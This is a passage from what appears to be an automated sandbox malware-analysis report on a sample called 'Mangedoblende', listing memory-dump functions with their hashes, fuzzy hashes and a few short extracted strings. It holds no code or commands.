                                                                                                                                                                            • Opcode ID: 74ec21e021872d47faddc72f023f002e2ae980097372379ddc9725203ce11fbd
                                                                                                                                                                            • Instruction ID: bed48e302dfce77f090c631fe92879453dc39461b75dcc7e9ca2c60380b327d4
                                                                                                                                                                            • Opcode Fuzzy Hash: 74ec21e021872d47faddc72f023f002e2ae980097372379ddc9725203ce11fbd
                                                                                                                                                                            • Instruction Fuzzy Hash: 1DD1AE78E00318CFDB55DFA5C994B9DBBB2AF89300F5081A9D908AB365DB349D81CF11
                                                                                                                                                                            Function 22810DF0 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 917de2640d052545a43e6a332123f337365bf58b77d532bc88e85cdfb1ddf49d
                                                                                                                                                                            • Instruction ID: e4cfb9b8a3cfda0b600b5af7b56f9fd88460517137503d61e2bd0c004541d49c
                                                                                                                                                                            • Opcode Fuzzy Hash: 917de2640d052545a43e6a332123f337365bf58b77d532bc88e85cdfb1ddf49d
                                                                                                                                                                            • Instruction Fuzzy Hash: EBD1AE78E00318CFDB55DFA5C994B9DBBB2AF89300F5081A9D908AB365DB359E81CF11
                                                                                                                                                                            Function 22811FF8 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: ef63a5d42ccd720362c45148dcbe6f76fb7506bdcc1cff1410d9e430367c6cb7
                                                                                                                                                                            • Instruction ID: 0e74177ec95653bde53d5d9821ac877b99150978c20cea9d52b566a8601993fd
                                                                                                                                                                            • Opcode Fuzzy Hash: ef63a5d42ccd720362c45148dcbe6f76fb7506bdcc1cff1410d9e430367c6cb7
                                                                                                                                                                            • Instruction Fuzzy Hash: 70D1AF78E00318CFDB55DFA5C994B9DBBB2AF89300F5081A9D908AB369DB349D81CF51
                                                                                                                                                                            Function 22814908 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6d40deb6a9706ad8e7b7a12d68526bc3ae87e47a6e9ec3639d438aa8af4a1480
                                                                                                                                                                            • Instruction ID: 40f87e0692f062136ce60faaf94c40f0a4640d67946004a46f863bed6d535b38
                                                                                                                                                                            • Opcode Fuzzy Hash: 6d40deb6a9706ad8e7b7a12d68526bc3ae87e47a6e9ec3639d438aa8af4a1480
                                                                                                                                                                            • Instruction Fuzzy Hash: 2CD1AFB8E00318CFDB55DFA5C994B9DBBB2AF89300F5081A9D908AB365DB359D81CF50
                                                                                                                                                                            Function 22811710 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 25ab498f96941be86b1ae7600be7e07c392c09158bffaaae3b2f3d4cfceb17f5
                                                                                                                                                                            • Instruction ID: 1f627aa847061b705fada61c19a107ebc8a482bb3782bbb73a2c737ff836c3c2
                                                                                                                                                                            • Opcode Fuzzy Hash: 25ab498f96941be86b1ae7600be7e07c392c09158bffaaae3b2f3d4cfceb17f5
                                                                                                                                                                            • Instruction Fuzzy Hash: ABD1AF78E00318CFDB15DFA5C984B9DBBB2AF89300F5081A9D908AB369DB349D81CF11
                                                                                                                                                                            Function 22812918 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: df8ba24d662d66ba25cede575f6d58d0e2a052ed789296ae8f96a76abfef65d9
                                                                                                                                                                            • Instruction ID: b7fbf7bc0f910ad379167a9f792a730b4ef695de118e041b602c913f9125c2c9
                                                                                                                                                                            • Opcode Fuzzy Hash: df8ba24d662d66ba25cede575f6d58d0e2a052ed789296ae8f96a76abfef65d9
                                                                                                                                                                            • Instruction Fuzzy Hash: 4DD1AE78E00318CFDB55DFA5C994B9DBBB2AF89300F5081A9D808AB369DB349D81CF11
                                                                                                                                                                            Function 22815228 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6e7e53aa3d5272c0a0b6bdc2f1642742b5d950e13379afe312ab28b84772bcf7
                                                                                                                                                                            • Instruction ID: dc18073cbee3bda53902e1901a150e7e9b8059a26aa7e088f582a90d55f8a10f
                                                                                                                                                                            • Opcode Fuzzy Hash: 6e7e53aa3d5272c0a0b6bdc2f1642742b5d950e13379afe312ab28b84772bcf7
                                                                                                                                                                            • Instruction Fuzzy Hash: EDD1AEB8E00318CFDB15DFA5C994B9DBBB2AF89300F5081A9D908AB365DB359D81CF50
                                                                                                                                                                            Function 22813238 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 857e06bbdf0785779649eaca61c0a3a63875f66b3e00fc67f592c81d00d24b36
                                                                                                                                                                            • Instruction ID: 2541fd87e823543681167b7adea98f8597a26dc09fd1cfa2598a4123e0c6510f
                                                                                                                                                                            • Opcode Fuzzy Hash: 857e06bbdf0785779649eaca61c0a3a63875f66b3e00fc67f592c81d00d24b36
                                                                                                                                                                            • Instruction Fuzzy Hash: 39D1AF78E00318CFDB15DFA5C994B9DBBB2AF89300F5081A9D808AB365DB359E81CF50
                                                                                                                                                                            Function 22810040 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: ea3973c936669bc673c65d737a5584d5c456b4306f1a409de5adc5414b63fee3
                                                                                                                                                                            • Instruction ID: 2e5427a82315f6c4773b8bf27d47b02471bdc5ec8d9f2fe907141451aab6e977
                                                                                                                                                                            • Opcode Fuzzy Hash: ea3973c936669bc673c65d737a5584d5c456b4306f1a409de5adc5414b63fee3
                                                                                                                                                                            • Instruction Fuzzy Hash: 61D19E78E00618CFDB15DFA5C994B9DBBB2AF89300F5081A9D908AB365DB359981CF11
                                                                                                                                                                            Function 22811BA0 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 219fa02d007c71466cc0bd781c9f65a63a06c3b04713f2c7778fe3621cfd076c
                                                                                                                                                                            • Instruction ID: 72ed71bc7181be5bda0d270140da0c29c0a2c13c764e666c11a254786cd30f1b
                                                                                                                                                                            • Opcode Fuzzy Hash: 219fa02d007c71466cc0bd781c9f65a63a06c3b04713f2c7778fe3621cfd076c
                                                                                                                                                                            • Instruction Fuzzy Hash: FAC1A178E05718CFDB14DFA5C984B9DBBB2AF89304F1081A9D408AB3A5DB359E81CF50
                                                                                                                                                                            Function 0018F974 Relevance: .3, Instructions: 265COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6fc822f9173a75f23e84302a7eba6051a372e798b3f71515e0062a3f5c7214a7
                                                                                                                                                                            • Instruction ID: f936af234c2f56b0b7006aa2b56885bc687979016b9af092136fdfeaa5b58bad
                                                                                                                                                                            • Opcode Fuzzy Hash: 6fc822f9173a75f23e84302a7eba6051a372e798b3f71515e0062a3f5c7214a7
                                                                                                                                                                            • Instruction Fuzzy Hash: BBC1AF74E04218CFDB14DFA5C994B9DBBB2BF89305F2081A9D809AB365DB359E81CF50
                                                                                                                                                                            Function 0018F2C4 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: f1dd574a1cf45a463ff76700b01ba7e45d6d51b612efbbb1f1a534aaaaeecddd
                                                                                                                                                                            • Instruction ID: c3cf80777cd75a9d01499b56be96fc16e7da837a8d8a642032f285f05ac374e0
                                                                                                                                                                            • Opcode Fuzzy Hash: f1dd574a1cf45a463ff76700b01ba7e45d6d51b612efbbb1f1a534aaaaeecddd
                                                                                                                                                                            • Instruction Fuzzy Hash: BE511970D05208DBDB08EFA9D5847AEBBB2BF89300F24D129E4047B294DB759A86CF54
                                                                                                                                                                            Function 0018F4AC Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 706f2746db9994895c93abc0fa93f32587b77030c1b83fdfbdef5a9dbdb88c9e
                                                                                                                                                                            • Instruction ID: 4cadb340f95701a706b6b7e9dfeed2d27528e0c098220897d051c56e57862cb9
                                                                                                                                                                            • Opcode Fuzzy Hash: 706f2746db9994895c93abc0fa93f32587b77030c1b83fdfbdef5a9dbdb88c9e
                                                                                                                                                                            • Instruction Fuzzy Hash: B051F670D05208CFDB04EFA8D594BAEBBB2FF49314F209169E405BB295D7399A82CF54
                                                                                                                                                                            Function 00181A18 Relevance: 5.1, Strings: 4, Instructions: 119COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: F$F$F$F
                                                                                                                                                                            • API String ID: 0-1844600021
                                                                                                                                                                            • Opcode ID: abc79c0819bd9d5f7d9ea85e36427b508f9db9433b405e082a0c4277ac512795
                                                                                                                                                                            • Instruction ID: b38a3dfce2a875c79b3ed9ddb2e2f81b1ab501707027838a886f84d8eab581a4
                                                                                                                                                                            • Opcode Fuzzy Hash: abc79c0819bd9d5f7d9ea85e36427b508f9db9433b405e082a0c4277ac512795
                                                                                                                                                                            • Instruction Fuzzy Hash: ED41D574E00249AFCB09EFB8C4416AE7BB6FF8A300F104968E4009B356DB345E46DF91
                                                                                                                                                                            Function 00181C10 Relevance: 5.1, Strings: 4, Instructions: 65COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: T$F$F$F
                                                                                                                                                                            • API String ID: 0-3026544444
                                                                                                                                                                            • Opcode ID: a5dd696867f49714701deacedbcc84904116366fe034636d7378a188af3252e1
                                                                                                                                                                            • Instruction ID: 2b2678d74309dc0149bc0547dac56495254ed5dec91f4bbfc69501646136e0f3
                                                                                                                                                                            • Opcode Fuzzy Hash: a5dd696867f49714701deacedbcc84904116366fe034636d7378a188af3252e1
                                                                                                                                                                            • Instruction Fuzzy Hash: AA216F74E002089BDB05EFB9C4417AEB7B6FF8A304F1084A9A4149B355EB785A45DF81
                                                                                                                                                                            Function 00186920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: \;eq$\;eq$\;eq$\;eq
                                                                                                                                                                            • API String ID: 0-3455962030
                                                                                                                                                                            • Opcode ID: 64f6756345535540945b97f097a9343817c926430fa7fbfe06f0d5ebbd19772f
                                                                                                                                                                            • Instruction ID: 7ac6368546ee836cbfa101641f64da39d4a56857621ea5e23261c2f172d377c1
                                                                                                                                                                            • Opcode Fuzzy Hash: 64f6756345535540945b97f097a9343817c926430fa7fbfe06f0d5ebbd19772f
                                                                                                                                                                            • Instruction Fuzzy Hash: 7001AD31B101158FCB68AE2DC584E2677E6BF98B68726416AE405CB3F5EB31ED41CF90